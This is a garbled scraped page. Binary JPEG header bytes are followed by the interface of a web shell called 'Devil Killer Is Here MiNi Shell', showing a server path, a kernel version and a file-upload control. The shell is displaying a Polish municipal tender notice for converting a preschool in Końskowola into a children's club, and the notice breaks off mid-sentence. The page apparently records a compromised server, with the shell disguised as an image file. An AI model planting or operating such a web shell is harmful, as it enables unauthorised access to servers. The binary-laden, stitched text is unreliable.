JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250313/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250313/0014510101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Adaptacja pomieszczeń Gminnego Przedszkola w Końskowoli na Klub Dziecięcy &#34;Promyczek&#34; wraz z urządzeniem placu zabaw. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Końskowola</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019661</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Pożowska</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Końskowola</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">24-130</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@konskowola.info.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ugkonskowola.bip.lubelskie.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Adaptacja pomieszczeń Gminnego Przedszkola w Końskowoli na Klub Dziecięcy &#34;Promyczek&#34; wraz z urządzeniem placu zabaw. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fe7f293a-a912-4e1c-bc80-0be595221f2e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00145101</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-03-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00016731/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Adaptacja pomieszczeń Gminnego Przedszkola w Końskowoli na Klub Dziecięcy &#34;Promyczek&#34; wraz z urządzeniem placu zabaw.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Źródło dofinansowania: Program rozwoju instytucji opieki nad dziećmi w wieku do lat 3 „MALUCH +” 2022- 2029- edycja I. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://gmina-konskowola.ezamawiajacy.pl/pn/gmina-konskowola/demand/200204/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Adres strony internetowej: https://gmina-konskowola.ezamawiajacy.pl w zakładce:<br/>„Korespondencja”. Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków,<br/>zawiadomień oraz informacji elektronicznie na adres e-mail: zamowienia@konskowola.info.pl 1. Komunikacja w postępowaniu o<br/>udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między<br/>zamawiającym, a wykonawcą z uwzględnieniem wyjątków określonych w ustawie pzp odbywa się przy użyciu środków komunikacji<br/>elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej rozumie się środki komunikacji<br/>elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2020 r., poz. 344 tj.)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Ogólne zasady korzystania z Platformy:<br/>zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Urzędu Miasta Końskowola;<br/>https://gmina-konskowola.ezamawiajacy.pl, lub https://oneplace.marketplanet.pl. Po założeniu konta Wykonawca ma możliwość<br/>złożenia Oferty w postępowaniu. Korzystanie z Platformy jest bezpłatne. Zamawiający określa dopuszczalny format kwalifikowanego<br/>podpisu elektronicznego, jako:<br/>1) dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,<br/>2) dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W<br/>związku z tym Wykonawca będzie zobowiązany załączyć prócz podpisanego dokumentu oddzielny plik z podpisem.<br/>Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>1) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) Komputer klasy PC lub MAC, spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej<br/>przeglądarki internetowej;<br/>3) Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS 1.2;<br/>4) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp,<br/>doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar,<br/>gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.: Plik załączony przez Wykonawcę na Platformie<br/>Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku<br/>dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/>Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego<br/>serwera synchronizowanego odpowiednim źródłem czasu</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art. 13 RODO związana z postępowaniem o udzielenie zamówienia publicznego.<br/>Klauzula informacyjna na podstawie art. 13 RODO<br/>Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE, dalej zwanego „RODO”) informujemy, że:<br/>1.	Administratorem Danych Osobowych przetwarzanych w Urzędzie Miasta Końskowola, Końskowola, ul. Pożowska 3a, tel. 81 881 62 01, ugkonskowola@post.pl jest Burmistrz Końskowoli. <br/>2.	Inspektorem Ochrony Danych Osobowych w Urzędzie Miasta Końskowola jest Roman Maruszak, tel. 81 881 62 01, kontakt e- mail: iodo@konskowola.info.pl<br/>3.	Podstawę prawną do przetwarzania przez administratora Pani/Pana danych osobowych stanowi art. 6 ust. 1 pkt c Rozporządzenia Parlamentu Europejskiego i Rady ( UE) 2016/679 z dnia 27 kwietnia 2016 r. oraz ustawa z 29 stycznia 2004 r. Prawo zamówień publicznych z późn. zm. ( Dz. U. z 2018 r. poz. 1986 z późn. zm.). Administrator Danych Osobowych przetwarza Pani/Pana dane w zakresie niezbędnym do realizacji celu, jakim jest postępowanie o udzielenie zamówienia publicznego na roboty budowlane pn.: „Adaptacja pomieszczeń Gminnego Przedszkola w Końskowoli na Klub Dziecięcy &#34;Promyczek&#34; wraz z urządzeniem placu zabaw.”, znak: ZP.271.1.1.2025<br/>4.	Odbiorcą Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy pzp. Dane mogą być przekazane innym podmiotom publicznym, które z mocy przepisów prawa mają do tego uprawnienie.<br/>5.	Osoba, której dane osobowe dotyczą ma prawo: <br/>	dostępu do treści danych - art. 15 RODO*, <br/>	ich sprostowania - art. 16 RODO** <br/>	do ograniczenia przetwarzania z zastrzeżeniem, o którym mowa w art. 18 ust. 2 RODO***<br/>8.	Obowiązek podania przez Panią/Pana danych osobowych jest obowiązkiem ustawowym wynikającym z Pzp, konsekwencje niepodania określonych danych wynikają w Pzp,<br/>9.	W przypadku powzięcia informacji o niezgodnym z prawem przetwarzaniu danych osobowych, przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego właściwego w sprawach ochrony danych osobowych tj. Prezesa Urzędu Ochrony Danych Osobowych. <br/>10.	Dane osobowe nie będą podlegały automatycznemu przetwarzaniu i profilowaniu.<br/>11.	Pani/Pana dane osobowe będą przechowywane przez czas niezbędny do realizacji celów, dla których dane te są przetwarzane, zgodnie z art. 78 ust. 1 ustawy pzp przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata okres przechowywania obejmuje cały czas trwania umowy, oraz czas niezbędny do zapewnienia korzystania ze środków ochrony prawnej, praw innej lub innych osób fizycznych i prawnych, lub z uwagi na ważne względy interesu publicznego. <br/>12.	Ma Pani/Pan możliwość wglądu w swoje dane osobowe przetwarzane przez Urząd Gminy Końskowola w związku z realizacją zamówienia publicznego w siedzibie urzędu<br/><br/>Wyjaśnienia<br/>*W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu. <br/>**prawo do sprostowania danych nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp, oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>***prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innych osób fizycznych lub prawnych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">6.	Nie przysługuje Pani/Panu prawo do:<br/>	usunięcia danych w związku z art. 17 ust. 3 lit. b, d lub e,<br/>	prawo do przenoszenia danych wynikające z art. 20 RODO,<br/>	prawo sprzeciwu wobec przetwarzania danych z uwagi na fakt, że podstawę przetwarzania stanowi art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.2.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> I część- Adaptacja pomieszczeń Gminnego Przedszkola w Końskowoli na Klub Dziecięcy &#34;Promyczek&#34;. W ramach robót budowlanych wykonane zostaną roboty budowlane polegające na wzniesieniu ścian działowych wydzielających nową łazienkę dla dzieci, powiększeniu łazienki dla niepełnosprawnych i personelu, wydzieleniu pomieszczeń zmywalni z części kuchennej, powiększeniu klatki schodowej, wydzieleniu pomieszczeń gospodarczych z kotłowni, wydzieleniu magazynu warzyw z magazynu ogólnego, zwężeniu otworu drzwiowego, wstawieniu stolarki drzwiowej oraz usunięciu <br/>i wykonaniu na nowo elementów wykończeniowych. Dodatkowo do wykonania pozostanie zamurowanie otworów okiennych oraz wymiana ocieplenia zewnętrznego na wełnę mineralną. W celu wykonania nowego wejścia należy na parterze zdemontować istniejące okna i wykuć fragment ściany zewnętrznej budynku przedszkola. Na poziomie piwnicy i pierwszego piętra należy zdemontować okna oznaczone na rysunkach oraz zewnętrzną istniejącą obróbkę blacharską na poziomie opaski przy budynku. Do wykonania będzie też dodatkowe wejście dla oddziału żłobkowego w ścianie zewnętrznej zachodniej. W celu osłony przed warunkami atmosferycznymi zaprojektowano zadaszenie nawiązujące do istniejącego oraz spocznik przed wejściem.<br/>Daszek nad wejściem jednospadowy o nachyleniu 10° i pokryty blachą trapezową. Woda<br/>opadowa odprowadzana będzie rynną i rurą spustową na teren działki inwestora.<br/><br/>Zasadnicze prace w budynku będą polegać na:<br/><br/>	roboty zabezpieczające i przygotowawcze;<br/>	roboty rozbiórkowe ścian , posadzek;<br/>	roboty demontażowe stolarki i wyposażenia instalacyjnego;<br/>	wykonaniu nowych ścian;<br/>	uzupełnieniu ubytków w wylewce istniejącej;<br/>	wykonaniu wylewki samopoziomującej;<br/>	wykonaniu przebić i bruzd instalacyjnych;<br/>	wykonaniu instalacji elektrycznych, niskoprądowych, sanitarnych;<br/>	montażu kanałów nawiewnych;<br/>	wykończeniu ścian;<br/>	ułożeniu nowych posadzek; <br/>	zamurowania, wydzielenie drzwi i daszku nad wejściem;<br/>Szczegółowy opis przedmiotu zamówienia zawarty jest w dokumentacji projektowej (projekt „Przebudowa ściany zewnętrznej w budynku przedszkola”, projekt „Zmiana sposobu użytkowania pomieszczeń gminnego przedszkola w Końskowoli na klub dziecięcego „Promyczek,”, projekt „Remont pomieszczeń wspólnych gminnego przedszkola oraz klubu dziecięcego „Promyczek” w Końskowoli” i STWiORB, przedmiarach, STWIORB dla adaptacji Klubu Dziecięcego stanowiącego załącznik nr 1A do SWZ oraz w projekcie zagospodarowania działki, STWiORB, przedmiarze stanowiących załącznik nr 1B do SWZ. Szczegółowy zakres obowiązków stron zawarty jest także we wzorze umowy stanowiącym załącznik nr 3 do SWZ.<br/><br/>Źródło dofinansowania: Program rozwoju instytucji opieki nad dziećmi w wieku do lat 3 „MALUCH +” 2022- 2029- edycja I.<br/><br/>Roboty budowlane realizowane na całej inwestycji mają być wykonane zgodnie ze sztuką budowlaną, zasadami wiedzy technicznej, zgodnie z dokumentacją projektową oraz na warunkach określonych we wzorze umowy. <br/><br/>Zamawiający informuje, że udostępnione przedmiary robót mają charakter pomocniczy dla sporządzenia oferty. Wykonawca zobowiązany jest w ofercie uwzględnić wszystkie roboty niezbędne do wykonania przedmiotu zamówienia zgodnie z obowiązującymi przepisami. Udostępnione przedmiary robót nie stanowią podstawy do wyceny ofert. <br/><br/>Wykonawca we własnym zakresie wykona odpowiednie zabezpieczenia i oznakowania robót.<br/><br/>Wykonawca zobowiązany jest także do opracowania dokumentacji powykonawczej, która obejmuje:<br/>1)	dokumentację budowy z naniesionymi zmianami dokonanymi w toku wykonywania robót oraz geodezyjnymi pomiarami powykonawczymi, w tym geodezyjną inwentaryzację powykonawczą oraz dokumentację geodezyjno-kartograficzną (jeżeli dotyczy);<br/>2)	oryginalne atesty i świadectwa potwierdzające dopuszczenie do stosowania użytych przy realizacji zamówienia materiałów budowlanych, elementów wykończenia stałego wyposażenia i technologii (jeżeli dotyczy);<br/>3)	uzyskanie w imieniu Zamawiającego wymaganych prawem skutecznych <br/>i niezbędnych uzgodnień oraz zgłoszenie zakończenia budowy wobec którego Organ nie wniósł sprzeciwu dla elementów, które zgodnie z przepisami nie wymagają decyzji pozwolenia na użytkowanie. Po podpisaniu umowy Zamawiający udzieli wykonawcy stosownego upoważnienia do działania w jego imieniu przed właściwymi instytucjami i organami w powyższej sprawie;<br/>4)	instrukcje, opisy i kopie kart gwarancyjnych urządzeń zamontowanych w wyniku realizacji robót (jeżeli dotyczy)<br/><br/>Wykonawca we własnym zakresie i na własny koszt zorganizuje sobie zaplecze budowy oraz dostawę mediów (energia elektryczna, woda, itp.), oraz przywróci teren po zapleczu budowy do stanu jaki był przed rozpoczęciem robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111100-9 - Roboty w zakresie burzenia</p> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45262520-2 - Roboty murowe</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">44541000-4 - Łańcuch naczepowy</p> <p class="mb-0">45431200-9 - Kładzenie glazury</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45261100-5 - Wykonywanie konstrukcji dachowych</p> <p class="mb-0">45422000-1 - Roboty ciesielskie</p> <p class="mb-0">45261210-9 - Wykonywanie pokryć dachowych</p> <p class="mb-0">45223210-1 - Roboty konstrukcyjne z wykorzystaniem stali</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-07-01 do 2025-08-14</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W przedmiotowym postępowaniu, Zamawiający, przy wyborze oferty najkorzystniejszej, zastosuje kryterium:<br/>1) Cena [C] 60% =60 pkt.<br/>2) Gwarancja i rękojmia [G] 40%= 40 pkt.<br/>2. Sposób obliczania punktów dla kryterium ceny :<br/>Poszczególny ofertom zostaną przyznane punkty za cenę obliczone wg poniższego wzoru:<br/>Cena oferty- max 60 pkt<br/>C = cena brutto oferty z najniższą ceną/cena brutto oferty badanej x 60 pkt<br/>Sposób obliczania punktów dla kryterium rękojmia i gwarancja:<br/>Rękojmia i gwarancja dotyczy wykonanych robót budowlanych oraz użytych materiałów. Poszczególnym ofertom zostaną przyznane<br/>punkty za długość okresu gwarancji i rękojmi z zastrzeżeniem że okres gwarancji nie może być krótszy niż 60 m-cy.<br/>Zamawiający informuje, iż poszczególnym ofertom zostaną przyznane punkty za długość okresu rękojmi i gwarancji z zastrzeżeniem,<br/>że jeżeli Wykonawca wskaże okres rękojmi i gwarancji krótszy niż 60 m-cy, to jego oferta zostanie odrzucona. Jeżeli Wykonawca nie<br/>wpisze okresu rękojmi i gwarancji to będzie to równoznaczne z zaoferowaniem okresu rękojmi i gwarancji 60 miesięcy i w takiej<br/>sytuacji Wykonawca nie otrzyma punktów<br/>w opisanym kryterium.<br/>W zawartej umowie zostanie wpisany okres rękojmi i gwarancji na podstawie informacji uzyskanych z formularza ofertowego.<br/>Punkty zostaną przyznane wg poniższego schematu:<br/> 60-66 miesięcy 0 pkt<br/> 67-73 miesięcy 20 pkt<br/> 74 -80 miesięcy 40 pkt<br/>Punkty zostaną przyznane na podstawie informacji zawartych w formularzu ofertowym. Kryterium rękojmia i gwarancja oceniany<br/>będzie na podstawie zadeklarowanego przez Wykonawcę okresu rękojmi i gwarancji (wyrażonego w pełnych miesiącach).<br/>Ostateczna ilość punktów dla każdej z ofert zostanie obliczona wg następującego wzoru:<br/>Łączna ilość punktów = C+G<br/>Maksymalnie oferta może otrzymać 100 